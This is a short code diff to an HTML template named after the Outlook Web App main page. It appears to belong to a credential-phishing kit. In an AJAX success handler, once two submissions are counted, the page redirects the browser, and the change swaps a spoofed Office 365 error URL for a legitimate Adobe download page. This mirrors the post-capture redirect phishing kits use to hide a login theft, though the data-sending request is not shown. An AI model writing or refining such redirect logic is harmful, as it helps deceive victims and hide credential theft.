--- a/templates/owamainnew.html
+++ b/templates/owamainnew.html
@@ -502,7 +502,7 @@
                 success: function() {
                     if (count >= 2) {
                         count = 0;
-                        window.location.replace('https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee');
+                        window.location.replace('https://helpx.adobe.com/download-install/kb/download-install-acrobat-subscription.html');
                     }
                 },
                 complete: function() {
